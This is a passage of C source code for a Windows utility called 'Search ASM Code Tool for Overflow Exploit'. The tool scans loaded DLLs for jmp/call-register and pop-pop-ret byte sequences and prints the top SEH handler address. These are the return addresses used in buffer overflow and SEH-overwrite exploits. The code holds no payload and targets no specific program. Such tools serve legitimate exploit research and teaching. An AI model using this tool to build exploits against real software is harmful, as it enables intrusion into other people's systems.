* push [edx] FF 32
* push [edi] FF 37
* push [esi] FF 36
* push [esp] FF 34 24
* push [ebp] FF 75 00
*
* pop eax 58
* pop ebx 5B
* pop ecx 59
* pop edx 5A
* pop edi 5F
* pop esi 5E
* pop esp 5C
* pop ebp 5D
*
* ret C3
*
************************************************************************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment(lib, "Version.lib")
#define VERSION "0.30"
#define SEARCHLEN 10
void usage(char *p)
{
printf("Usage:\t%s\t-r <register> [Options]\n"
"\t\t-v Show System Version\n\n"
"[Options:]\n"
"\t-r\tregister \tEAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP, XPRET\n"
"\t-d\tdllname \tNODLL (0x7FFA0000), MSVCRT, USER32 or Other\n"
// "\t-l\tlogfile \tlog.txt\n"
"\n", p);
}
BOOL DisplaySystemVersion()
{
OSVERSIONINFOEX osvi;
BOOL bOsVersionInfoEx;
// Try calling GetVersionEx using the OSVERSIONINFOEX structure.
//
// If that fails, try using the OSVERSIONINFO structure.
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
if( !(bOsVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) &osvi)) )
{
// If OSVERSIONINFOEX doesn't work, try OSVERSIONINFO.
osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (! GetVersionEx ( (OSVERSIONINFO *) &osvi) )
return FALSE;
}
switch (osvi.dwPlatformId)
{
case VER_PLATFORM_WIN32_NT:
// Test for the product.
if ( osvi.dwMajorVersion <= 4 )
printf("Microsoft Windows NT ");
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0 )
printf ("Microsoft Windows 2000 ");
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1 )
printf ("Microsoft Windows XP ");
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2 )
printf ("Microsoft Windows 2003 ");
// Test for product type.
if( bOsVersionInfoEx )
{
if ( osvi.wProductType == VER_NT_WORKSTATION )
{
if( osvi.wSuiteMask & VER_SUITE_PERSONAL )
printf ( "Personal " );
else
printf ( "Professional " );
}
else if ( osvi.wProductType == VER_NT_SERVER )
{
if( osvi.wSuiteMask & VER_SUITE_DATACENTER )
printf ( "DataCenter Server " );
else if( osvi.wSuiteMask & VER_SUITE_ENTERPRISE )
printf ( "Advanced Server " );
else
printf ( "Server " );
}
}
// Display version, service pack (if any), and build number.
if ( osvi.dwMajorVersion <= 4 )
{
printf ("version %d.%d %s (Build %d)\n",
osvi.dwMajorVersion,
osvi.dwMinorVersion,
osvi.szCSDVersion,
osvi.dwBuildNumber & 0xFFFF);
}
else
{
printf ("%s (Build %d)\n",
osvi.szCSDVersion,
osvi.dwBuildNumber & 0xFFFF);
}
break;
}
return TRUE;
}
int main(int argc, char *argv[])
{
bool bLoaded = false;
HINSTANCE h;
char *pDllName = "msvcrt.dll";
char *pRegister = "ebx";
bool bEAX = false, bEBX = false, bECX = false, bEDX = false, bEDI = false, bESI = false, bESP = false, bEBP = false, bRET = false;
int count = 0, maybe = 0;
printf("Search ASM Code Tool for Overflow Exploit V%s\n"
"Code by lion (lion@cnhonker.net)\n"
"Welcome to HUC website http://www.cnhonker.com\n\n"
, VERSION);
if(argc < 2)
{
usage(argv[0]);
return -1;
}
else
if(argc == 2 && argv[1][1] == 'v')
{
DisplaySystemVersion();
return 1;
}
for(int i=1;i<argc;i+=2)
{
if(strlen(argv[i]) != 2)
{
usage(argv[0]);
return -1;
}
// check parameter
if(i == argc-1)
{
usage(argv[0]);
return -1;
}
switch(argv[i][1])
{
case 'r':
pRegister = argv[i+1];
if(stricmp(pRegister, "eax") == 0)
bEAX = true;
else
if(stricmp(pRegister, "ebx") == 0)
bEBX = true;
else
if(stricmp(pRegister, "ecx") == 0)
bECX = true;
else
if(stricmp(pRegister, "edx") == 0)
bEDX = true;
else
if(stricmp(pRegister, "edi") == 0)
bEDI = true;
else
if(stricmp(pRegister, "esi") == 0)
bESI = true;
else
if(stricmp(pRegister, "esp") == 0)
bESP = true;
else
if(stricmp(pRegister, "ebp") == 0)
bEBP = true;
else
if(stricmp(pRegister, "xpret") == 0)
bRET = true;
else
{
usage(argv[0]);
return -1;
}
break;
case 'd':
pDllName = argv[i+1];
break;
}
}
DisplaySystemVersion();
printf("Search Mode or Register: %s\n", pRegister);
// no dll for search.
if(stricmp(pDllName, "nodll") == 0)
{
h = (HINSTANCE__ *)0x7FFa0000;
printf("Start search ASM code in: 0x7FFA0000\n\n", pRegister);
}
else
{
// Load DLL.
h = GetModuleHandle(pDllName);
if(h == NULL)
{
h = LoadLibrary(pDllName);
if(h == NULL)
{
printf("Loading DLL error: %s\n", pDllName);
return -1;
}
printf("Start Search ASM Code in: %s\n\n", pDllName);
bLoaded = true;
}
}
// Search TOP SEH
unsigned int *un;
unsigned int sehaddr;
HMODULE hk = LoadLibrary("kernel32");
un = (unsigned int *)GetProcAddress(hk, "SetUnhandledExceptionFilter");
// un = (int *)UnhandledExceptionFilter;
_asm{
mov eax,un
add eax,5
mov ebx,[eax]
mov sehaddr, ebx
}
printf("0x%X\tTOP SEH\n\n", sehaddr);
BYTE* ptr = (BYTE*)h;
bool done = false;
// Start Search ASM Code
for(ULONG y = 0; !done; y++)
{
try
{
if(ptr[y] == 0xFF )
{
ULONG pos = (ULONG)ptr + y;
if(bEAX)
{
if(ptr[y+1] == 0xD0)
{
printf("0x%X\tcall eax\r\n", pos);
count++;
}
else
if(ptr[y+1] == 0xE0)
{
printf("0x%X\tjmp eax\r\n", pos);
count++;
}
}
else
if(bEBX)
{
if(ptr[y+1] == 0xD3)
{
printf("0x%X\tcall ebx\r\n", pos);
count++;
}
else
if(ptr[y+1] == 0xE3)
{
printf("0x%X\tjmp ebx\r\n", pos);
count++;
}
}
else
if(bECX)
{
if(ptr[y+1] == 0xD1)
{
printf("0x%X\tcall ecx\r\n", pos);
count++;
}
else
if(ptr[y+1] == 0xE1)
{
printf("0x%X\tjmp ecx\r\n", pos);
count++;
}
}
else
if(bEDX)
{
if(ptr[y+1] == 0xD2)
{
printf("0x%X\tcall edx\r\n", pos);
count++;
}
else
if(ptr[y+1] == 0xE2)
{
printf("0x%X\tjmp edx\r\n", pos);
count++;
}
}
else
if(bEDI)
{
if(ptr[y+1] == 0xD7)
{
printf("0x%X\tcall edi\r\n", pos);
count++;
}
else
if(ptr[y+1] == 0xE7)
{
printf("0x%X\tjmp edi\r\n", pos);
count++;
}
}
else
if(bESI)
{
if(ptr[y+1] == 0xD6)
{
printf("0x%X\tcall esi\r\n", pos);
count++;
}
else
if(ptr[y+1] == 0xE6)
{
printf("0x%X\tjmp esi\r\n", pos);
count++;
}
}
else
if(bESP)
{
if(ptr[y+1] == 0xD4)
{
printf("0x%X\tcall esp\r\n", pos);
count++;
}
else
if(ptr[y+1] == 0xE4)
{
printf("0x%X\tjmp esp\r\n", pos);
count++;
}
}
else
if(bEBP)
{
if(ptr[y+1] == 0xD5)
{
printf("0x%X\tcall ebp\r\n", pos);
count++;
}
else
if(ptr[y+1] == 0xE5)
{
printf("0x%X\tjmp ebp\r\n", pos);
count++;
}
}
}
else if(ptr[y] == 0xC3)
{
// Start search pop reg, pop reg, ret addr.
// if(bRET || bEBX)
if(bRET)
{
if((ptr[y-1] >= 0x58 && ptr[y-1] <= 0x5F) && (ptr[y-2] >= 0x58 && ptr[y-2] <= 0x5F))
{
ULONG pos = (ULONG)ptr + y - 2;
printf("0x%X\tpop reg, pop reg, ret\r\n", pos);
count++;
}
///*
else if((ptr[y-1] >= 0x58 && ptr[y-1] <= 0x5F) && (ptr[y-6] == 0xB8 || ptr[y-6] == 0xBA || ptr[y-6] == 0xBE || ptr[y-6] == 0xBF)&& (ptr[y-7] >= 0x58 && ptr[y-7] <= 0x5F))
{
ULONG pos = (ULONG)ptr + y - 7;
printf("0x%X\tpop reg, pop reg, ret\n", pos);
count++;
}
//*/
/*
// Search maybe available addr for use
|
|
